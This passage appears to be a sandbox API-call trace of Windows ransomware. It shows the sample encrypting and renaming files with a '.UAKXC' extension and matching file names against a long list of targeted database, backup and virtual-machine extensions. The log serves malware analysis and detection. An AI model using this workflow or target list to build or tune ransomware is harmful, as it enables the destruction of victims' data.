lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" [0141.296] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.UAKXC" [0141.296] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.uakxc")) returned 1 [0141.296] GetProcessHeap () returned 0xea0000 [0141.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef1c0 | out: hHeap=0xea0000) returned 1 [0141.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2740 | out: hHeap=0xea0000) returned 1 [0141.297] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0141.297] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0141.297] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0141.297] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn")) returned 0x2022 [0141.298] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0141.298] GetLastError () returned 0x0 [0141.298] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=338) returned 1 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.298] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.299] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.300] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.301] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.302] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.303] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.304] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.305] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.341] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.341] 